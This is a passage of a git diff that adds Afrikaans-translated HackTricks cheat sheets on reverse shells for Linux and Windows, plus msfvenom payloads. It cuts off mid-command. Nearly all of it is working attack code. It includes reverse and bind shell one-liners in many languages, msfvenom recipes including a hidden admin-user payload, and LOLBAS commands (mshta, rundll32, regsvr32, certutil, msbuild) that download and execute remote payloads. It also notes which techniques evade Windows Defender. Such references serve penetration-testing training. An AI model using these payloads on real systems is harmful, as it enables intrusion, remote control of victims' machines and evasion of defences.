+require('child_process').exec("bash -c 'bash -i >& /dev/tcp/10.10.14.2/6767 0>&1'") + +or + +-var x = global.process.mainModule.require +-x('child_process').exec('nc [IPADDR] [PORT] -e /bin/bash') + +or + +// If you get to the constructor of a function you can define and execute another function inside a string +"".sub.constructor("console.log(global.process.mainModule.constructor._load(\"child_process\").execSync(\"id\").toString())")() +"".__proto__.constructor.constructor("console.log(global.process.mainModule.constructor._load(\"child_process\").execSync(\"id\").toString())")() + + +or + +// Abuse this syntax to get a reverse shell +var fs = this.process.binding('fs'); +var fs = process.binding('fs'); + +or + +https://gitlab.com/0x4ndr3/blog/blob/master/JSgen/JSgen.py +``` +## OpenSSL + +Die Aanvaller (Kali) +```bash +openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Generate certificate +openssl s_server -quiet -key key.pem -cert cert.pem -port #Here you will be able to introduce the commands +openssl s_server -quiet -key key.pem -cert cert.pem -port #Here yo will be able to get the response +``` +Die Slachtoffer +```bash +#Linux +openssl s_client -quiet -connect :|/bin/bash|openssl s_client -quiet -connect : + +#Windows +openssl.exe s_client -quiet -connect :|cmd.exe|openssl s_client -quiet -connect : +``` +## **Socat** + +[https://github.com/andrew-d/static-binaries](https://github.com/andrew-d/static-binaries) + +### Bind shell +```bash +victim> socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane +attacker> socat FILE:`tty`,raw,echo=0 TCP::1337 +``` +### Terugskakel +```bash +attacker> socat TCP-LISTEN:1337,reuseaddr FILE:`tty`,raw,echo=0 +victim> socat TCP4::1337 EXEC:bash,pty,stderr,setsid,sigint,sane +``` +## Awk +```bash +awk 'BEGIN {s = "/inet/tcp/0//"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null +``` +## Vinger + +**Aanvaller** +```bash +while true; do nc -l 79; done +``` +Om die opdrag te stuur, skryf dit neer, druk enter en druk CTRL+D (om STDIN te stop) + +**Slachtoffer** +```bash +export X=Connected; while true; do X=`eval $(finger "$X"@ 2> /dev/null')`; sleep 1; done + +export X=Connected; while true; do X=`eval $(finger "$X"@ 2> /dev/null | grep '!'|sed 's/^!//')`; sleep 1; done +``` +## Gawk +```bash +#!/usr/bin/gawk -f + +BEGIN { +Port = 8080 +Prompt = "bkd> " + +Service = "/inet/tcp/" Port "/0/0" +while (1) { +do { +printf Prompt |& Service +Service |& getline cmd +if (cmd) { +while ((cmd |& getline) > 0) +print $0 |& Service +close(cmd) +} +} while (cmd != "exit") +close(Service) +} +} +``` +## Xterm + +Dit sal probeer om met jou stelsel te verbind op poort 6001: +```bash +xterm -display 10.0.0.1:1 +``` +Om die omgekeerde skulp te vang kan jy gebruik (wat op poort 6001 sal luister): +```bash +# Authorize host +xhost +targetip +# Listen +Xnest :1 +``` +## Groovy + +deur [frohoff](https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76) LET WEL: Java reverse shell werk ook vir Groovy +```bash +String host="localhost"; +int port=8044; +String cmd="cmd.exe"; +Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close(); +``` +## Verwysings + +* [https://highon.coffee/blog/reverse-shell-cheat-sheet/](https://highon.coffee/blog/reverse-shell-cheat-sheet/) +* [http://pentestmonkey.net/cheat-sheet/shells/reverse-shell](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell) +* [https://tcm1911.github.io/posts/whois-and-finger-reverse-shell/](https://tcm1911.github.io/posts/whois-and-finger-reverse-shell/) +* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md) + +**Probeer Hard Sekuriteitsgroep** + +
+ +{% embed url="https://discord.gg/tryhardsecurity" %} + +{% hint style="success" %} +Leer & oefen AWS Hacking:[**HackTricks Opleiding AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Leer & oefen GCP Hacking: [**HackTricks Opleiding GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Ondersteun HackTricks + +* Kyk na die [**subskripsie planne**](https://github.com/sponsors/carlospolop)! +* **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Deel hacking truuks deur PRs in te dien na die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/generic-methodologies-and-resources/reverse-shells/msfvenom.md b/generic-methodologies-and-resources/reverse-shells/msfvenom.md new file mode 100644 index 000000000..0e03fc1fa --- /dev/null +++ b/generic-methodologies-and-resources/reverse-shells/msfvenom.md @@ -0,0 +1,242 @@ +# MSFVenom - CheatSheet + +{% hint style="success" %} +Leer & oefen AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Leer & oefen GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Ondersteun HackTricks + +* Kyk na die [**subskripsie planne**](https://github.com/sponsors/carlospolop)! +* **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Deel hacking truuks deur PRs in te dien na die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +
+ +Sluit aan by [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) bediener om te kommunikeer met ervare hackers en bug bounty jagters! + +**Hacking Inligting**\ +Betrek met inhoud wat die opwinding en uitdagings van hacking ondersoek + +**Regte-Tyd Hack Nuus**\ +Bly op hoogte van die vinnige hacking wêreld deur regte-tyd nuus en insigte + +**Laaste Aankondigings**\ +Bly ingelig oor die nuutste bug bounties wat bekendgestel word en belangrike platform opdaterings + +**Sluit by ons aan op** [**Discord**](https://discord.com/invite/N3FrSbmwdy) en begin vandag saamwerk met top hackers! + +*** + +## Basiese msfvenom + +`msfvenom -p -e -f -i LHOST=` + +Mens kan ook die `-a` gebruik om die argitektuur te spesifiseer of die `--platform` + +## Lyste +```bash +msfvenom -l payloads #Payloads +msfvenom -l encoders #Encoders +``` +## Algemene parameters wanneer 'n shellcode geskep word +```bash +-b "\x00\x0a\x0d" +-f c +-e x86/shikata_ga_nai -i 5 +EXITFUNC=thread +PrependSetuid=True #Use this to create a shellcode that will execute something with SUID +``` +## **Windows** + +### **Terug Shell** + +{% code overflow="wrap" %} +```bash +msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > reverse.exe +``` +{% endcode %} + +### Bind Shell + +{% code overflow="wrap" %} +```bash +msfvenom -p windows/meterpreter/bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f exe > bind.exe +``` +### Skep Gebruiker + +{% code overflow="wrap" %} +```bash +msfvenom -p windows/adduser USER=attacker PASS=attacker@123 -f exe > adduser.exe +``` +{% endcode %} + +### CMD Shell + +{% code overflow="wrap" %} +```bash +msfvenom -p windows/shell/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > prompt.exe +``` +### **Voer Opdrag Uit** + +{% code overflow="wrap" %} +```bash +msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.webClient).downloadString('http://IP/nishang.ps1')\"" -f exe > pay.exe +msfvenom -a x86 --platform Windows -p windows/exec CMD="net localgroup administrators shaun /add" -f exe > pay.exe +``` +### Encoder +```bash +msfvenom -p windows/meterpreter/reverse_tcp -e shikata_ga_nai -i 3 -f exe > encoded.exe +``` +{% endcode %} + +### Ingebed binne uitvoerbare + +{% code overflow="wrap" %} +```bash +msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= -x /usr/share/windows-binaries/plink.exe -f exe -o plinkmeter.exe +``` +{% endcode %} + +## Linux Payloads + +### Reverse Shell + +{% code overflow="wrap" %} +```bash +msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f elf > reverse.elf +msfvenom -p linux/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elf +``` +{% endcode %} + +### Bind Shell + +{% code overflow="wrap" %} +```bash +msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f elf > bind.elf +``` +### SunOS (Solaris) + +{% code overflow="wrap" %} +```bash +msfvenom --platform=solaris --payload=solaris/x86/shell_reverse_tcp LHOST=(ATTACKER IP) LPORT=(ATTACKER PORT) -f elf -e x86/shikata_ga_nai -b '\x00' > solshell.elf +``` +{% endcode %} + +## **MAC Payloads** + +### **Reverse Shell:** + +{% code overflow="wrap" %} +```bash +msfvenom -p osx/x86/shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f macho > reverse.macho +``` +{% endcode %} + +### **Bind Shell** + +{% code overflow="wrap" %} +```bash +msfvenom -p osx/x86/shell_bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f macho > bind.macho +``` +{% endcode %} + +## **Web-gebaseerde Payloads** + +### **PHP** + +#### Terugskakel**l** + +{% code overflow="wrap" %} +```bash +msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php +cat shell.php | pbcopy && echo ' shell.php && pbpaste >> shell.php +``` +{% endcode %} + +### ASP/x + +#### Terug shell + +{% code overflow="wrap" %} +```bash +msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f asp >reverse.asp +msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f aspx >reverse.aspx +``` +{% endcode %} + +### JSP + +#### Terugskakel + +{% code overflow="wrap" %} +```bash +msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f raw> reverse.jsp +``` +{% endcode %} + +### OORLOG + +#### Terug Shell + +{% code overflow="wrap" %} +```bash +msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f war > reverse.war +``` +{% endcode %} + +### NodeJS +```bash +msfvenom -p nodejs/shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) +``` +## **Script Taal payloads** + +### **Perl** + +{% code overflow="wrap" %} +```bash +msfvenom -p cmd/unix/reverse_perl LHOST=(IP Address) LPORT=(Your Port) -f raw > reverse.pl +``` +### **Python** +```bash +msfvenom -p cmd/unix/reverse_python LHOST=(IP Address) LPORT=(Your Port) -f raw > reverse.py +``` +### **Bash** +```bash +msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh +``` +{% endcode %} + +
+ +Sluit aan by [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) bediener om met ervare hackers en bug bounty jagters te kommunikeer! + +**Hacking Inligting**\ +Betrek met inhoud wat die opwinding en uitdagings van hacking ondersoek + +**Regte Tyd Hack Nuus**\ +Bly op hoogte van die vinnige hacking wêreld deur regte tyd nuus en insigte + +**Laaste Aankondigings**\ +Bly ingelig oor die nuutste bug bounties wat bekendgestel word en belangrike platform opdaterings + +**Sluit by ons aan op** [**Discord**](https://discord.com/invite/N3FrSbmwdy) en begin vandag saamwerk met top hackers! + +{% hint style="success" %} +Leer & oefen AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Leer & oefen GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Ondersteun HackTricks + +* Kyk na die [**subskripsie planne**](https://github.com/sponsors/carlospolop)! +* **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Deel hacking truuks deur PRs in te dien na die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/generic-methodologies-and-resources/reverse-shells/windows.md b/generic-methodologies-and-resources/reverse-shells/windows.md new file mode 100644 index 000000000..9785efb62 --- /dev/null +++ b/generic-methodologies-and-resources/reverse-shells/windows.md @@ -0,0 +1,506 @@ +# Shells - Windows + +{% hint style="success" %} +Leer & oefen AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Leer & oefen GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Kyk na die [**subskripsie planne**](https://github.com/sponsors/carlospolop)! +* **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Deel hacking truuks deur PRs in te dien na die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +**Try Hard Security Group** + +
+ +{% embed url="https://discord.gg/tryhardsecurity" %} + +*** + +## Lolbas + +Die bladsy [lolbas-project.github.io](https://lolbas-project.github.io/) is vir Windows soos [https://gtfobins.github.io/](https://gtfobins.github.io/) vir linux.\ +Dit is duidelik, **daar is geen SUID lêers of sudo regte in Windows nie**, maar dit is nuttig om te weet **hoe** sommige **binaries** (mis)bruik kan word om 'n soort onverwagte aksies uit te voer soos **arbitraire kode uit te voer.** + +## NC +```bash +nc.exe -e cmd.exe +``` +## NCAT +slagoffer +``` +ncat.exe -e "cmd.exe /c (cmd.exe 2>&1)" +#Encryption to bypass firewall +ncat.exe --ssl -e "cmd.exe /c (cmd.exe 2>&1)" +``` +aanvaller +``` +ncat -l +#Encryption to bypass firewall +ncat -l --ssl +``` +## SBD + +**[sbd](https://www.kali.org/tools/sbd/) is 'n draagbare en veilige Netcat alternatief**. Dit werk op Unix-agtige stelsels en Win32. Met funksies soos sterk versleuteling, programuitvoering, aanpasbare bronpoorte, en deurlopende herverbinding, bied sbd 'n veelsydige oplossing vir TCP/IP kommunikasie. Vir Windows gebruikers kan die sbd.exe weergawe van die Kali Linux verspreiding as 'n betroubare vervanging vir Netcat gebruik word. +```bash +# Victims machine +sbd -l -p 4444 -e bash -v -n +listening on port 4444 + + +# Atackers +sbd 10.10.10.10 4444 +id +uid=0(root) gid=0(root) groups=0(root) +``` +## Python +```bash +#Windows +C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.11.0.37', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))" +``` +## Perl +```bash +perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' +perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' +``` +## Ruby +```bash +#Windows +ruby -rsocket -e 'c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' +``` +## Lua +```bash +lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()' +``` +## OpenSSH + +Aanvaller (Kali) +```bash +openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Generate certificate +openssl s_server -quiet -key key.pem -cert cert.pem -port #Here you will be able to introduce the commands +openssl s_server -quiet -key key.pem -cert cert.pem -port #Here yo will be able to get the response +``` +Slachtoffer +```bash +#Linux +openssl s_client -quiet -connect :|/bin/bash|openssl s_client -quiet -connect : + +#Windows +openssl.exe s_client -quiet -connect :|cmd.exe|openssl s_client -quiet -connect : +``` +## Powershell +```bash +powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex" +powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/ipw.ps1')" +Start-Process -NoNewWindow powershell "IEX(New-Object Net.WebClient).downloadString('http://10.222.0.26:8000/ipst.ps1')" +echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile +``` +Proses wat netwerkoproep uitvoer: **powershell.exe**\ +Payload op skyf geskryf: **NEE** (_ten minste nêrens waar ek met procmon kon vind!_) +```bash +powershell -exec bypass -f \\webdavserver\folder\payload.ps1 +``` +Proses wat netwerkoproep uitvoer: **svchost.exe**\ +Payload op skyf geskryf: **WebDAV-kliënt plaaslike kas** + +**Een-liner:** +```bash +$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() +``` +**Kry meer inligting oor verskillende Powershell-shelle aan die einde van hierdie dokument** + +## Mshta + +* [Van hier](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) +```bash +mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")")) +``` + +```bash +mshta http://webserver/payload.hta +``` + +```bash +mshta \\webdavserver\folder\payload.hta +``` +#### **Voorbeeld van hta-psh omgekeerde skulp (gebruik hta om PS agterdeur af te laai en uit te voer)** +```xml + +``` +**Jy kan baie maklik 'n Koadic zombie aflaai en uitvoer met die stager hta** + +#### hta voorbeeld + +[**Van hier**](https://gist.github.com/Arno0x/91388c94313b70a9819088ddf760683f) +```xml + + + + + + + + + +``` +#### **mshta - sct** + +[**Van hier**](https://gist.github.com/Arno0x/e472f58f3f9c8c0c941c83c58f254e17) +```xml + + + + + + + + + +``` +#### **Mshta - Metasploit** +```bash +use exploit/windows/misc/hta_server +msf exploit(windows/misc/hta_server) > set srvhost 192.168.1.109 +msf exploit(windows/misc/hta_server) > set lhost 192.168.1.109 +msf exploit(windows/misc/hta_server) > exploit +``` + +```bash +Victim> mshta.exe //192.168.1.109:8080/5EEiDSd70ET0k.hta #The file name is given in the output of metasploit +``` +**Gevind deur verdediger** + + + + +## **Rundll32** + +[**Dll hello world voorbeeld**](https://github.com/carterjones/hello-world-dll) + +* [Van hier](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) +```bash +rundll32 \\webdavserver\folder\payload.dll,entrypoint +``` + +```bash +rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close(); +``` +**Gevind deur verdediger** + +**Rundll32 - sct** + +[**Van hier**](https://gist.github.com/Arno0x/e472f58f3f9c8c0c941c83c58f254e17) +```xml + + + + + + + + +``` +#### **Rundll32 - Metasploit** +```bash +use windows/smb/smb_delivery +run +#You will be given the command to run in the victim: rundll32.exe \\10.2.0.5\Iwvc\test.dll,0 +``` +**Rundll32 - Koadic** +```bash +use stager/js/rundll32_js +set SRVHOST 192.168.1.107 +set ENDPOINT sales +run +#Koadic will tell you what you need to execute inside the victim, it will be something like: +rundll32.exe javascript:"\..\mshtml, RunHTMLApplication ";x=new%20ActiveXObject("Msxml2.ServerXMLHTTP.6.0");x.open("GET","http://10.2.0.5:9997/ownmG",false);x.send();eval(x.responseText);window.close(); +``` +## Regsvr32 + +* [Van hier](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) +```bash +regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll +``` + +``` +regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll +``` +**Gedig deur verdediger** + +#### Regsvr32 -sct + +[**Van hier**](https://gist.github.com/Arno0x/81a8b43ac386edb7b437fe1408b15da1) +```markup + + + + + + + + +``` +#### **Regsvr32 - Metasploit** +```bash +use multi/script/web_delivery +set target 3 +set payload windows/meterpreter/reverse/tcp +set lhost 10.2.0.5 +run +#You will be given the command to run in the victim: regsvr32 /s /n /u /i:http://10.2.0.5:8080/82j8mC8JBblt.sct scrobj.dll +``` +**Jy kan baie maklik 'n Koadic zombie aflaai en uitvoer met die stager regsvr** + +## Certutil + +* [Van hier](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) + +Laai 'n B64dll af, dekodeer dit en voer dit uit. +```bash +certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll +``` +Laai 'n B64exe af, dekodeer dit en voer dit uit. +```bash +certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe +``` +**Gevind deur verdediger** + + +## **Cscript/Wscript** +```bash +powershell.exe -c "(New-Object System.NET.WebClient).DownloadFile('http://10.2.0.5:8000/reverse_shell.vbs',\"$env:temp\test.vbs\");Start-Process %windir%\system32\cscript.exe \"$env:temp\test.vbs\"" +``` +**Cscript - Metasploit** +```bash +msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 -f vbs > shell.vbs +``` +**Gevind deur verdediger** + +## PS-Bat +```bash +\\webdavserver\folder\batchfile.bat +``` +Proses wat netwerkoproep uitvoer: **svchost.exe**\ +Payload op skyf geskryf: **WebDAV-kliënt plaaslike kas** +```bash +msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 > shell.bat +impacket-smbserver -smb2support kali `pwd` +``` + +```bash +\\10.8.0.3\kali\shell.bat +``` +**Gevind deur verdediger** + +## **MSIExec** + +Aanvaller +``` +msfvenom -p windows/meterpreter/reverse_tcp lhost=10.2.0.5 lport=1234 -f msi > shell.msi +python -m SimpleHTTPServer 80 +``` +Slachtoffer: +``` +victim> msiexec /quiet /i \\10.2.0.5\kali\shell.msi +``` +**Gevind** + +## **Wmic** + +* [Van hier](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) +```bash +wmic os get /format:"https://webserver/payload.xsl" +``` +Voorbeeld xsl-lêer [van hier](https://gist.github.com/Arno0x/fa7eb036f6f45333be2d6d2fd075d6a7): +```xml + + + + + + + +``` +**Nie gedetecteer nie** + +**Jy kan baie maklik 'n Koadic zombie aflaai en uitvoer met die stager wmic** + +## Msbuild + +* [Van hier](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) +``` +cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml" +``` +U kan hierdie tegniek gebruik om toepassingswitlys en Powershell.exe-beperkings te omseil. U sal met 'n PS-skal gevra word.\ +Laai net dit af en voer dit uit: [https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj](https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj) +``` +C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildShell.csproj +``` +**Nie gedetecteer nie** + +## **CSC** + +Compileer C# kode op die slagoffer masjien. +``` +C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:shell.exe shell.cs +``` +You can download a basic C# reverse shell from here: [https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc](https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc) + +**Nie gedetecteer nie** + +## **Regasm/Regsvc** + +* [Van hier](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) +```bash +C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll +``` +**Ek het dit nie probeer nie** + +[**https://gist.github.com/Arno0x/71ea3afb412ec1a5490c657e58449182**](https://gist.github.com/Arno0x/71ea3afb412ec1a5490c657e58449182) + +## Odbcconf + +* [Van hier](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) +```bash +odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt} +``` +**Ek het dit nie probeer nie** + +[**https://gist.github.com/Arno0x/45043f0676a55baf484cbcd080bbf7c2**](https://gist.github.com/Arno0x/45043f0676a55baf484cbcd080bbf7c2) + +## Powershell Skale + +### PS-Nishang + +[https://github.com/samratashok/nishang](https://github.com/samratashok/nishang) + +In die **Skale** gids, is daar 'n klomp verskillende skale. Om Invoke-_PowerShellTcp.ps1_ te aflaai en uit te voer, maak 'n kopie van die skrif en voeg by die einde van die lêer: +``` +Invoke-PowerShellTcp -Reverse -IPAddress 10.2.0.5 -Port 4444 +``` +Begin om die skrip op 'n webbediener te bedien en voer dit aan die slagoffer se kant uit: +``` +powershell -exec bypass -c "iwr('http://10.11.0.134/shell2.ps1')|iex" +``` +Defender detecteer dit nie as kwaadwillige kode nie (nog, 3/04/2019). + +**TODO: Kontroleer ander nishang shells** + +### **PS-Powercat** + +[**https://github.com/besimorhino/powercat**](https://github.com/besimorhino/powercat) + +Laai af, begin 'n webbediener, begin die luisteraar, en voer dit op die slagoffer se kant uit: +``` +powershell -exec bypass -c "iwr('http://10.2.0.5/powercat.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd" +``` +Defender detecteer dit nie as kwaadwillige kode nie (nog, 3/04/2019). + +**Ander opsies wat deur powercat aangebied word:** + +Bind shells, Reverse shell (TCP, UDP, DNS), Port redirect, upload/download, Generate payloads, Serve files... +``` +Serve a cmd Shell: +powercat -l -p 443 -e cmd +Send a cmd Shell: +powercat -c 10.1.1.1 -p 443 -e cmd +Send a powershell: +powercat -c 10.1.1.1 -p 443 -ep +Send a powershell UDP: +powercat -c 10.1.1.1 -p 443 -ep -u +TCP Listener to TCP Client Relay: +powercat -l -p 8000 -r tcp:10.1.1.16:443 +Generate a reverse tcp payload which connects back to 10.1.1.15 port 443: +powercat -c 